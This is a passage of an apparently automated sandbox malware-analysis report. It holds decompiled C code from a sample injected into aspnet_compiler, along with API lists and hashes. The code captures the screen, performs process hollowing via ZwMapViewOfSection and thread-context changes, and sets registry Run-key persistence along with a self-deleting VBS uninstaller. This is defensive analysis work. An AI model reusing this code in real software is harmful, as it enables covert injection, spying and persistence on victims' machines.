							_t113 = StretchBlt(_t234, 0, 0, _v196, _v188, _t223, _v180, _v176, _v196, _v188, 0xcc0020);
							__eflags = _t113;
							if(_t113 == 0) {
								goto L11;
							}
							__eflags = _v233;
							if(_v233 != 0) {
								_v172 = 0x14;
								_t177 =  *0x4736e4( &_v172);
								__eflags = _t177;
								if(_t177 != 0) {
									_t179 = GetIconInfo(_v168,  &_v132);
									__eflags = _t179;
									if(_t179 != 0) {
										_t232 = _v160 - _v132.yHotspot - _v224;
										__eflags = _t232;
										DeleteObject(_v132.hbmColor);
										DeleteObject(_v132.yHotspot);
										DrawIcon(_t234, _v164 - _v132.xHotspot - _v228, _t232, _v176);
										_t219 = _v228;
										_t223 = _v240;
									}
								}
							}
							_push( &_v152);
							_t118 = 0x18;
							_t119 = GetObjectA(_t219, _t118, ??);
							__eflags = _t119;
							if(_t119 == 0) {
								goto L11;
							} else {
								_t122 = _v146 * _v148 & 0x0000ffff;
								__eflags = _t122 - 1;
								if(_t122 != 1) {
									_push(4);
									_pop(1);
									_v252 = 1;
									__eflags = _t122 - 1;
									if(_t122 <= 1) {
										L28:
										__eflags = 1 << 1;
										_push(0x2eb6edc);
										L29:
										_t225 = LocalAlloc(0x40, ??);
										_t195 = 0x18;
										_t225->bmiHeader = 0x28;
										_t225->bmiHeader.biWidth = _v160;
										_t225->bmiHeader.biHeight = _v156;
										_t225->bmiHeader.biPlanes = _v148;
										_t225->bmiHeader.biBitCount = _v146;
										_t131 = _v252;
										__eflags = _t131 - _t195;
										if(_t131 < _t195) {
											__eflags = 1;
											_t225->bmiHeader.biClrUsed = 1 << _t131;
										}
										_t225->bmiHeader.biCompression = _t225->bmiHeader.biCompression & 0x00000000;
										_t225->bmiHeader.biClrImportant = _t225->bmiHeader.biClrImportant & 0x00000000;
										asm("cdq");
										_t215 = 1;
										_t137 = (_t225->bmiHeader.biWidth + 8 >> 3) * (_v252 & 0x0000ffff) * _t225->bmiHeader.biHeight;
										_t225->bmiHeader.biSizeImage = _t137;
										_t138 = GlobalAlloc(0, _t137);
										_v244 = _t138;
										__eflags = _t138;
										if(_t138 != 0) {
											__eflags = GetDIBits(_t234, _t219, 0, _t225->bmiHeader.biHeight & 0x0000ffff, _t138, _t225, 0);
											if(__eflags != 0) {
												_v252 = 0x4d42;
												_v250 = _t225->bmiHeader.biSizeImage + _t225->bmiHeader + _t225->bmiHeader.biClrUsed * 4 + 0xe;
												_v246 = 0;
												_v242 = _t225->bmiHeader + _t225->bmiHeader.biClrUsed * 4 + 0xe;
												E004020BF(_t185,  &_v236);
												E004020BF(_t185,  &_v148);
												E004024EA(_t185,  &_v236, 1, __eflags,  &_v252, 0xe);
												L00403356( &_v244);
												E004024EA(_t185,  &_v248, 1, __eflags, _t225, 0x28);
												L00403356( &_v256);
												_t226 = _v296;
												E004024EA(_t185,  &_v260, 1, __eflags, _t226, _t225->bmiHeader.biSizeImage);
												L00403356( &_v268);
												DeleteObject(_t219);
												GlobalFree(_t226);
												DeleteDC(_v308);
												__eflags = _t234 -  *0x4726ac;
												if(__eflags != 0) {
													DeleteDC(_t234);
												}
												E00402035(_t185, _t185, _t234, __eflags,  &_v156);
												E00401FB8();
												E00401FB8();
												L9:
												return _t185;
											}
											DeleteDC(_v268);
											DeleteDC(_t234);
											DeleteObject(_t219);
											GlobalFree(_v284);
										} else {
											DeleteDC(_v240);
											L12:
											DeleteDC(_t234);
											DeleteObject(_t219);
											L7:
										}
										goto L8;
									}
									_push(8);
									_pop(1);
									_v252 = 1;
									__eflags = _t122 - 1;
									if(_t122 <= 1) {
										goto L28;
									}
									_push(0x10);
									_pop(1);
									_v252 = 1;
									__eflags = _t122 - 1;
									if(_t122 <= 1) {
										goto L28;
									}
									_t214 = 0x18;
									__eflags = _t122 - _t214;
									if(_t122 > _t214) {
										_push(0x20);
										_pop(1);
										L27:
										_v252 = 1;
										goto L28;
									}
									_v252 = _t214;
									_push(0x28);
									goto L29;
								}
								goto L27;
							}
						}
						L11:
						DeleteDC(_t223);
						goto L12;
					}
					DeleteDC(_t223);
					DeleteDC(_t234);
					DeleteObject(_t219);
					goto L7;
				}
			}


























































                0x00417a23
                0x00417a2f
                0x00417a3b
                0x00417a43
                0x00417a46
                0x00417a57
                0x00417a59
                0x00417a5e
                0x00417a62
                0x00417a64
                0x00417a6a
                0x00417a80
                0x00417a85
                0x00417a87
                0x00417a8b
                0x00417a8b
                0x00417a91
                0x00417ae3
                0x00417aea
                0x00000000
                0x00417a97
                0x00417a9e
                0x00417aa2
                0x00417aa7
                0x00417ab5
                0x00417ac6
                0x00417ac8
                0x00417ace
                0x00417afe
                0x00417b04
                0x00417b06
                0x00417b36
                0x00417b3c
                0x00417b3e
                0x00000000
                0x00000000
                0x00417b40
                0x00417b45
                0x00417b4b
                0x00417b54
                0x00417b5a
                0x00417b5c
                0x00417b6a
                0x00417b70
                0x00417b72
                0x00417b95
                0x00417b95
                0x00417b99
                0x00417ba6
                0x00417bb3
                0x00417bb9
                0x00417bbd
                0x00417bbd
                0x00417b72
                0x00417b5c
                0x00417bc5
                0x00417bc8
                0x00417bcb
                0x00417bd1
                0x00417bd3
                0x00000000
                0x00417bd9
                0x00417be5
                0x00417be8
                0x00417beb
                0x00417bf1
                0x00417bf3
                0x00417bf4
                0x00417bf8
                0x00417bfb
                0x00417c2c
                0x00417c2e
                0x00417c37
                0x00417c38
                0x00417c40
                0x00417c44
                0x00417c45
                0x00417c4f
                0x00417c56
                0x00417c5e
                0x00417c67
                0x00417c6b
                0x00417c6f
                0x00417c72
                0x00417c79
                0x00417c7b
                0x00417c7b
                0x00417c88
                0x00417c8c
                0x00417c90
                0x00417c91
                0x00417c9f
                0x00417ca6
                0x00417ca9
                0x00417caf
                0x00417cb3
                0x00417cb5
                0x00417cd3
                0x00417cd5
                0x00417d02
                0x00417d17
                0x00417d1d
                0x00417d30
                0x00417d34
                0x00417d40
                0x00417d50
                0x00417d61
                0x00417d6d
                0x00417d7e
                0x00417d86
                0x00417d8f
                0x00417da0
                0x00417da6
                0x00417dad
                0x00417dbd
                0x00417dbf
                0x00417dc5
                0x00417dc8
                0x00417dc8
                0x00417dd4
                0x00417de0
                0x00417de9
                0x00417af2
                0x00417afb
                0x00417afb
                0x00417ce1
                0x00417ce4
                0x00417ce7
                0x00417cf2
                0x00417cb7
                0x00417b0f
                0x00417b09
                0x00417b12
                0x00417add
                0x00417add
                0x00417add
                0x00000000
                0x00417cb5
                0x00417bfd
                0x00417bff
                0x00417c00
                0x00417c04
                0x00417c07
                0x00000000
                0x00000000
                0x00417c09
                0x00417c0b
                0x00417c0c
                0x00417c10
                0x00417c13
                0x00000000
                0x00000000
                0x00417c17
                0x00417c18
                0x00417c1b
                0x00417c25
                0x00417c27
                0x00417c28
                0x00417c28
                0x00000000
                0x00417c28
                0x00417c1d
                0x00417c21
                0x00000000
                0x00417c21
                0x00000000
                0x00417bed
                0x00417bd3
                0x00417b08
                0x00417b0f
                0x00000000
                0x00417b0f
                0x00417ad7
                0x00417ada
                0x00417add
                0x00000000
                0x00417add

                APIs
                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417A3D
                • CreateCompatibleDC.GDI32(00000000), ref: 00417A4A
                  • Part of subcall function 00417E84: EnumDisplaySettingsW.USER32 ref: 00417EB4
                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00417AC0
                • DeleteDC.GDI32(00000000), ref: 00417AD7
                • DeleteDC.GDI32(00000000), ref: 00417ADA
                • DeleteObject.GDI32(00000000), ref: 00417ADD
                • SelectObject.GDI32(00000000,00000000), ref: 00417AFE
                • DeleteDC.GDI32(00000000), ref: 00417B0F
                • DeleteDC.GDI32(00000000), ref: 00417B12
                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00417B36
                • GetIconInfo.USER32(?,?), ref: 00417B6A
                • DeleteObject.GDI32(?), ref: 00417B99
                • DeleteObject.GDI32(?), ref: 00417BA6
                • DrawIcon.USER32 ref: 00417BB3
                • GetObjectA.GDI32(00000000,00000018,?), ref: 00417BCB
                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00417C3A
                • GlobalAlloc.KERNEL32(00000000,?), ref: 00417CA9
                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417CCD
                • DeleteDC.GDI32(?), ref: 00417CE1
                • DeleteDC.GDI32(00000000), ref: 00417CE4
                • DeleteObject.GDI32(00000000), ref: 00417CE7
                • GlobalFree.KERNEL32 ref: 00417CF2
                • DeleteObject.GDI32(00000000), ref: 00417DA6
                • GlobalFree.KERNEL32 ref: 00417DAD
                • DeleteDC.GDI32(?), ref: 00417DBD
                • DeleteDC.GDI32(00000000), ref: 00417DC8
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                • String ID: DISPLAY
                • API String ID: 479521175-865373369
                • Opcode ID: ec15fa98cea3d78183887d2b25b4fad16d43b420e78df4d292cf44244b22c479
                • Instruction ID: 14e7487399ba1fd70ea331c62ec4cafd0bb9d4ecd5deee876d7c9955afd64b2a
                • Opcode Fuzzy Hash: ec15fa98cea3d78183887d2b25b4fad16d43b420e78df4d292cf44244b22c479
                • Instruction Fuzzy Hash: E5B138715083059FD720AF24DD44BABBBF8EF88755F00482EF98993291EB34E945CB5A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00416FDD Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                Download Yara Rule
                C-Code - Quality: 57%
                			E00416FDD(intOrPtr __ecx, void __edx) {
				void* __edi;
				_Unknown_base(*)()* _t81;
				int _t87;
				signed int _t110;
				int _t117;
				intOrPtr _t119;
				int _t122;
				long _t123;
				int _t128;
				void _t141;
				void* _t145;
				intOrPtr _t146;
				intOrPtr _t148;
				intOrPtr _t154;
				struct _PROCESS_INFORMATION* _t157;
				void _t158;
				intOrPtr _t160;
				intOrPtr* _t162;
				intOrPtr* _t164;
				int _t166;
				void* _t167;
				void* _t168;

				_t164 = __edx;
				_t157 =  *(_t167 + 0x94);
				 *(_t167 + 0x34) = __edx;
				 *((intOrPtr*)(_t167 + 0x30)) = __ecx;
				 *((intOrPtr*)(_t167 + 0x1c)) = 0;
				while(1) {
					 *(_t167 + 0x34) = 0;
					 *(_t167 + 0x18) = 0;
					 *((intOrPtr*)(_t167 + 0x1c)) = 0;
					 *((intOrPtr*)(_t167 + 0x20)) = 0;
					 *0x470d90 = GetProcAddress(GetModuleHandleA("ntdll"), "ZwCreateSection");
					 *0x470d84 = GetProcAddress(GetModuleHandleA("ntdll"), "ZwMapViewOfSection");
					 *0x470d88 = GetProcAddress(GetModuleHandleA("ntdll"), "ZwUnmapViewOfSection");
					_t81 = GetProcAddress(GetModuleHandleA("ntdll"), "ZwClose");
					 *0x470d8c = _t81;
					if( *0x470d84 == 0 ||  *0x470d88 == 0 ||  *0x470d90 == 0 || _t81 == 0) {
						break;
					}
					_t160 = 0x44;
					E00435760(_t157, _t167 + 0x4c, 0, _t160);
					_t168 = _t167 + 0xc;
					 *((intOrPtr*)(_t168 + 0x48)) = _t160;
					E00435760(_t157, _t157, 0, 0x10);
					_t167 = _t168 + 0xc;
					if( *_t164 != 0x5a4d) {
						break;
					}
					_t162 =  *((intOrPtr*)(_t164 + 0x3c)) + _t164;
					if( *_t162 != 0x4550) {
						break;
					}
					_t87 =  *(_t162 + 0x50);
					 *(_t167 + 0x24) = _t87;
					 *(_t167 + 0x44) = _t87;
					 *((intOrPtr*)(_t167 + 0x48)) = 0;
					 *((intOrPtr*)(_t167 + 0x2c)) =  *((intOrPtr*)(_t162 + 0x34));
					if(CreateProcessW(0,  *(_t167 + 0x50), 0, 0, 0, 4, 0, 0, _t167 + 0x4c, _t157) == 0) {
						GetLastError();
						break;
					}
					_t145 = VirtualAlloc(0, 4, 0x1000, 4);
					 *(_t167 + 0x3c) = _t145;
					 *_t145 = 0x10007;
					if(GetThreadContext(_t157->hThread, _t145) == 0 || ReadProcessMemory(_t157->hProcess,  *((intOrPtr*)(_t145 + 0xa4)) + 8, _t167 + 0x34, 4, _t167 + 0x3c) == 0) {
						L32:
						VirtualFree(_t145, 0, 0x8000);
						 *0x470d88(GetCurrentProcess(), _t167 + 0x14);
						 *0x470d8c( *(_t167 + 0x18));
						TerminateProcess(_t157->hProcess, 0);
						break;
					} else {
						_push(0);
						_push(0x8000000);
						_push(0x40);
						_push(_t167 + 0x4c);
						_push(0);
						_push(0xf001f);
						_push(_t167 + 0x30);
						if( *0x470d90() != 0) {
							goto L32;
						}
						_t110 =  !( *(_t162 + 0x16) & 0x0000ffff) & 0x00000001;
						 *(_t167 + 0x24) = _t110;
						if(_t110 == 0) {
							_t141 =  *(_t167 + 0x28);
							 *(_t167 + 0x18) = _t141;
							 *0x470d88(_t157->hProcess, _t141);
						}
						_push(0x40);
						_push(0);
						_push(1);
						_push(_t167 + 0x24);
						_push(0);
						_push(0);
						_push(0);
						_push(_t167 + 0x2c);
						_push(_t157->hProcess);
						_push( *(_t167 + 0x3c));
						if( *0x470d84() == 0) {
							_t117 =  *0x470d84( *(_t167 + 0x3c), GetCurrentProcess(), _t167 + 0x30, 0, 0, 0, _t167 + 0x24, 1, 0, 0x40);
							__eflags = _t117;
							if(_t117 != 0) {
								goto L32;
							}
							__eflags =  *(_t167 + 0x24) - _t117;
							if( *(_t167 + 0x24) != _t117) {
								 *((intOrPtr*)(_t162 + 0x34)) =  *((intOrPtr*)(_t167 + 0x10));
							}
							E004351E0( *((intOrPtr*)(_t167 + 0x1c)), _t164,  *((intOrPtr*)(_t162 + 0x54)));
							 *(_t167 + 0x3c) =  *(_t167 + 0x3c) & 0x00000000;
							_t119 =  *((intOrPtr*)(_t164 + 0x3c));
							_t167 = _t167 + 0xc;
							__eflags = 0 -  *(_t162 + 6);
							if(0 >=  *(_t162 + 6)) {
								L23:
								__eflags =  *(_t167 + 0x24);
								_t154 =  *((intOrPtr*)(_t167 + 0x10));
								if( *(_t167 + 0x24) != 0) {
									_t129 =  *(_t167 + 0x28);
									__eflags =  *(_t167 + 0x28) - _t154;
									if(__eflags != 0) {
										E004173F1( *((intOrPtr*)(_t167 + 0x1c)), __eflags, _t129, 0, _t154, 0);
										_t154 =  *((intOrPtr*)(_t167 + 0x20));
										_t167 = _t167 + 0x10;
									}
								}
								__eflags =  *((intOrPtr*)(_t167 + 0x2c)) - _t154;
								if( *((intOrPtr*)(_t167 + 0x2c)) == _t154) {
									L29:
									 *((intOrPtr*)(_t145 + 0xb0)) =  *((intOrPtr*)(_t162 + 0x28)) + _t154;
									_t122 = SetThreadContext(_t157->hThread, _t145);
									__eflags = _t122;
									if(_t122 == 0) {
										goto L32;
									}
									_t123 = ResumeThread(_t157->hThread);
									__eflags = _t123 - 0xffffffff;
									if(_t123 == 0xffffffff) {
										goto L32;
									}
									return 1;
								} else {
									_t128 = WriteProcessMemory(_t157->hProcess,  *((intOrPtr*)(_t145 + 0xa4)) + 8, _t167 + 0x18, 4, 0);
									__eflags = _t128;
									if(_t128 == 0) {
										goto L32;
									}
									_t154 =  *((intOrPtr*)(_t167 + 0x10));
									goto L29;
								}
							} else {
								_t158 =  *(_t167 + 0x34);
								_t146 =  *((intOrPtr*)(_t167 + 0x30));
								_t166 = _t164 + 0x10c + _t119;
								__eflags = _t166;
								do {
									E004351E0( *((intOrPtr*)(_t166 - 8)) +  *((intOrPtr*)(_t167 + 0x1c)),  *_t166 + _t158,  *((intOrPtr*)(_t166 - 4)));
									_t166 = _t166 + 0x28;
									_t167 = _t167 + 0xc;
									_t146 = _t146 + 1;
									__eflags = _t146 - ( *(_t162 + 6) & 0x0000ffff);
								} while (_t146 < ( *(_t162 + 6) & 0x0000ffff));
								_t157 =  *(_t167 + 0x94);
								_t145 =  *(_t167 + 0x38);
								goto L23;
							}
						} else {
							VirtualFree(_t145, 0, 0x8000);
							 *0x470d8c( *(_t167 + 0x18));
							TerminateProcess( *_t157, 0);
							_t148 =  *((intOrPtr*)(_t167 + 0x1c)) + 1;
							_push(0);
							 *((intOrPtr*)(_t167 + 0x20)) = _t148;
							_pop(0);
							if(_t148 <= 0x64) {
								continue;
							}
							break;
						}
					}
				}
				return 0;
			}

























                0x00416ff4
                0x00416ff7
                0x00416ffe
                0x00417002
                0x00417006
                0x0041700a
                0x00417014
                0x00417018
                0x0041701c
                0x00417020
                0x00417033
                0x00417047
                0x0041705b
                0x00417063
                0x0041706c
                0x00417071
                0x00000000
                0x00000000
                0x0041709b
                0x004170a5
                0x004170aa
                0x004170ad
                0x004170b5
                0x004170bf
                0x004170c6
                0x00000000
                0x00000000
                0x004170cf
                0x004170d7
                0x00000000
                0x00000000
                0x004170dd
                0x004170e1
                0x004170e5
                0x004170e9
                0x004170f0
                0x0041710d
                0x00417368
                0x00000000
                0x00417368
                0x00417123
                0x00417126
                0x0041712a
                0x0041713b
                0x00417332
                0x0041733a
                0x0041734c
                0x00417356
                0x00417360
                0x00000000
                0x00417167
                0x00417167
                0x00417169
                0x0041716e
                0x00417174
                0x00417175
                0x00417177
                0x00417180
                0x00417189
                0x00000000
                0x00000000
                0x00417195
                0x00417198
                0x0041719c
                0x0041719e
                0x004171a5
                0x004171a9
                0x004171a9
                0x004171af
                0x004171b7
                0x004171b8
                0x004171ba
                0x004171bb
                0x004171bc
                0x004171bd
                0x004171c2
                0x004171c3
                0x004171c5
                0x004171d1
                0x0041723a
                0x00417240
                0x00417242
                0x00000000
                0x00000000
                0x00417248
                0x0041724c
                0x00417252
                0x00417252
                0x0041725d
                0x00417262
                0x00417269
                0x0041726c
                0x0041726f
                0x00417273
                0x004172b5
                0x004172b5
                0x004172ba
                0x004172be
                0x004172c0
                0x004172c4
                0x004172c6
                0x004172d2
                0x004172d7
                0x004172db
                0x004172db
                0x004172c6
                0x004172de
                0x004172e2
                0x00417307
                0x0041730d
                0x00417316
                0x0041731c
                0x0041731e
                0x00000000
                0x00000000
                0x00417323
                0x00417329
                0x0041732c
                0x00000000
                0x00000000
                0x00000000
                0x004172e4
                0x004172f9
                0x004172ff
                0x00417301
                0x00000000
                0x00000000
                0x00417303
                0x00000000
                0x00417303
                0x00417275
                0x00417275
                0x0041727f
                0x00417283
                0x00417283
                0x00417285
                0x00417296
                0x0041729f
                0x004172a2
                0x004172a5
                0x004172a6
                0x004172a6
                0x004172aa
                0x004172b1
                0x00000000
                0x004172b1
                0x004171d3
                0x004171db
                0x004171e5
                0x004171ef
                0x004171ff
                0x00417200
                0x00417202
                0x0041720f
                0x00417210
                0x00000000
                0x00000000
                0x00000000
                0x00417216
                0x004171d1
                0x0041713b
                0x00000000

                APIs
                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00417024
                • GetProcAddress.KERNEL32(00000000), ref: 00417027
                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00417038
                • GetProcAddress.KERNEL32(00000000), ref: 0041703B
                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041704C
                • GetProcAddress.KERNEL32(00000000), ref: 0041704F
                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00417060
                • GetProcAddress.KERNEL32(00000000), ref: 00417063
                • CreateProcessW.KERNEL32 ref: 00417105
                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041711D
                • GetThreadContext.KERNEL32(?,00000000), ref: 00417133
                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00417159
                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004171DB
                • TerminateProcess.KERNEL32(?,00000000), ref: 004171EF
                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041722F
                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 004172F9
                • SetThreadContext.KERNEL32(?,00000000), ref: 00417316
                • ResumeThread.KERNEL32(?), ref: 00417323
                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041733A
                • GetCurrentProcess.KERNEL32(?), ref: 00417345
                • TerminateProcess.KERNEL32(?,00000000), ref: 00417360
                • GetLastError.KERNEL32 ref: 00417368
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                • API String ID: 4188446516-3035715614
                • Opcode ID: 26beb8965d7d96426694d17baad4d02b611eba89cef2aa280885858bf170de8b
                • Instruction ID: 266150a76addbd25bf96a89ad10f512fef98d9a90c2618b82beff4a0ecbb5786
                • Opcode Fuzzy Hash: 26beb8965d7d96426694d17baad4d02b611eba89cef2aa280885858bf170de8b
                • Instruction Fuzzy Hash: E1A15DB0548304EFD7209F61DC85BAB7BF8FB48705F10042AFA55D6291D778E884CB6A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040C5A4 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 259registryCOMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E0040C5A4() {
				short _v524;
				char _v548;
				char _v572;
				char _v576;
				char _v596;
				char _v600;
				void* _v604;
				char _v620;
				char _v624;
				void* _v628;
				char _v644;
				char _v648;
				char _v652;
				char _v668;
				char _v672;
				void* _v676;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				void* _t71;
				void* _t82;
				void* _t84;
				void* _t85;
				signed char _t123;
				signed char _t124;
				void* _t195;
				void* _t228;
				void* _t230;
				void* _t231;
				void* _t232;

				E00411D93();
				if( *0x46f9d4 != 0x30) {
					E0040AE1C();
				}
				_t228 =  *0x470d63 - 1; // 0x0
				if(_t228 == 0) {
					E004185EF(_t195, _t228);
				}
				if( *0x470a85 != 0) {
					E0041AC0A(E00401EE4(0x472d40), _t195);
				}
				_t213 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t230 =  *0x470b33 - 1; // 0x1
				if(_t230 == 0) {
					E00412D0B(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00401EE4(0x473208));
				}
				_t231 =  *0x470b30 - 1; // 0x1
				if(_t231 == 0) {
					E00412D0B(0x80000002, _t213, E00401EE4(0x473208));
				}
				_t232 =  *0x470b31 - 1; // 0x0
				if(_t232 == 0) {
					E00412D0B(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00401EE4(0x473208));
				}
				E00435760(0,  &_v524, 0, 0x208);
				_t49 = E0040245C();
				_t50 = E00401F8B(0x473280);
				_t53 = E004129E0(E00401F8B(0x473238), "exepath",  &_v524, 0x208, _t50, _t49);
				_t233 = _t53;
				if(_t53 == 0) {
					GetModuleFileNameW(0,  &_v524, 0x208);
				}
				RegDeleteKeyA(0x80000001, E00401F8B(0x473238));
				_t56 = E00406E2B(_t233);
				_t234 = _t56;
				if(_t56 != 0) {
					SetFileAttributesW(E00401EE4(0x473250), 0x80);
				}
				_t123 =  ~(SetFileAttributesW( &_v524, 0x80));
				asm("sbb bl, bl");
				E00402FF4(_t123,  &_v548, E0041A7B9( &_v620, E0041A4D3( &_v668)), 0, 0x46a8f0, _t234, L".vbs");
				E00401EE9();
				E00401FB8();
				E004042FD(_t123,  &_v576, E00402FF4(_t123,  &_v672, E0040415E(_t123,  &_v620, _t60, 0x46a8f0, E0043A99F(_t123,  &_v668, _t234, L"Temp")), 0, 0x46a8f0, _t234, "\\"), 0x46a8f0, _t234,  &_v548);
				E00401EE9();
				E00401EE9();
				_t71 = E0040415E(_t123,  &_v672, _t67, 0x46a8f0, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
				_t202 = L"On Error Resume Next\n";
				E004042DC(_t123,  &_v652, L"On Error Resume Next\n", 0x46a8f0, _t234, _t71);
				E00401EE9();
				_t124 = _t123 & 0x00000001;
				_t235 = _t124;
				if(_t124 != 0) {
					_t202 = E004042DC(_t124,  &_v624, L"while fso.FileExists(\"", 0x46a8f0, _t235, E0040415E(_t124,  &_v596, L"On Error Resume Next\n", 0x46a8f0,  &_v524));
					E0040323D(E00402FF4(_t124,  &_v672, _t98, 0, 0x46a8f0, _t235, L"\")\n"));
					E00401EE9();
					E00401EE9();
					E00401EE9();
				}
				E0040323D(E00402FF4(_t124,  &_v600, E00402FF4(_t124,  &_v672, E0040415E(_t124,  &_v620, _t202, 0x46a8f0, L"fso.DeleteFile \""), 0, 0x46a8f0, _t235,  &_v524), 0, 0x46a8f0, _t235, L"\"\n"));
				E00401EE9();
				E00401EE9();
				E00401EE9();
				_t236 = _t124;
				if(_t124 != 0) {
					L004086C6(_t124,  &_v644, 0, 0x46a8f0, L"wend\n");
				}
				_t82 = E00406E2B(_t236);
				_t237 = _t82;
				if(_t82 != 0) {
					_t36 =  &_v668; // 0x473250
					E0040323D(E00402FF4(_t124,  &_v596, E0040AEF6(_t36, L"fso.DeleteFolder \"", 0x46a8f0, 0x473250), 0, 0x46a8f0, _t237, L"\"\n"));
					E00401EE9();
					E00401EE9();
				}
				L004086C6(_t124,  &_v644, 0, 0x46a8f0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t84 = E00401EE4( &_v576);
				_t85 = E0040245C();
				E00401EE4( &_v648);
				if(E0041AD6A(_t85 + _t85, _t84, 0) != 0) {
					ShellExecuteW(0, L"open", E00401EE4( &_v572), 0x46a8f0, 0x46a8f0, 0);
				}
				ExitProcess(0);
			}


































                0x0040c5ae
                0x0040c5ba
                0x0040c5bc
                0x0040c5bc
                0x0040c5c4
                0x0040c5ca
                0x0040c5cc
                0x0040c5cc
                0x0040c5d8
                0x0040c5e6
                0x0040c5e6
                0x0040c5f0
                0x0040c5f5
                0x0040c5fb
                0x0040c60c
                0x0040c611
                0x0040c617
                0x0040c61d
                0x0040c62b
                0x0040c630
                0x0040c631
                0x0040c637
                0x0040c648
                0x0040c64d
                0x0040c65f
                0x0040c66e
                0x0040c676
                0x0040c698
                0x0040c6a0
                0x0040c6a2
                0x0040c6ae
                0x0040c6ae
                0x0040c6c1
                0x0040c6d5
                0x0040c6e0
                0x0040c6e2
                0x0040c6f1
                0x0040c6f1
                0x0040c708
                0x0040c70f
                0x0040c72a
                0x0040c734
                0x0040c73d
                0x0040c776
                0x0040c780
                0x0040c789
                0x0040c797
                0x0040c79d
                0x0040c7a6
                0x0040c7b0
                0x0040c7b5
                0x0040c7b5
                0x0040c7b8
                0x0040c7e0
                0x0040c7f1
                0x0040c7fa
                0x0040c803
                0x0040c80c
                0x0040c80c
                0x0040c849
                0x0040c852
                0x0040c85b
                0x0040c864
                0x0040c869
                0x0040c86b
                0x0040c876
                0x0040c876
                0x0040c884
                0x0040c889
                0x0040c88b
                0x0040c898
                0x0040c8b3
                0x0040c8bc
                0x0040c8c5
                0x0040c8c5
                0x0040c8d3
                0x0040c8dd
                0x0040c8e7
                0x0040c8f4
                0x0040c906
                0x0040c91b
                0x0040c91b
                0x0040c922

                APIs
                  • Part of subcall function 00411D93: TerminateProcess.KERNEL32(00000000,pth_unenc,0040EE0B), ref: 00411DA3
                  • Part of subcall function 00411D93: WaitForSingleObject.KERNEL32(000000FF), ref: 00411DB6
                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00473238,?,pth_unenc), ref: 0040C6AE
                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C6C1
                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00473238,?,pth_unenc), ref: 0040C6F1
                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00473238,?,pth_unenc), ref: 0040C700
                  • Part of subcall function 0040AE1C: TerminateThread.KERNEL32(00409880,00000000,pth_unenc,0040C5C1,00473220,00473238,?,pth_unenc), ref: 0040AE2B
                  • Part of subcall function 0040AE1C: UnhookWindowsHookEx.USER32(?), ref: 0040AE3B
                  • Part of subcall function 0040AE1C: TerminateThread.KERNEL32(0040986A,00000000,?,pth_unenc), ref: 0040AE4D
                  • Part of subcall function 0041A4D3: GetCurrentProcessId.KERNEL32(00000000,7476FBB0,00000000,?,?,?,?,0046A8F0,0040C716,.vbs,?,?,?,?,?,00473238), ref: 0041A4FA
                • ShellExecuteW.SHELL32(00000000,open,00000000,0046A8F0,0046A8F0,00000000), ref: 0040C91B
                • ExitProcess.KERNEL32 ref: 0040C922
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
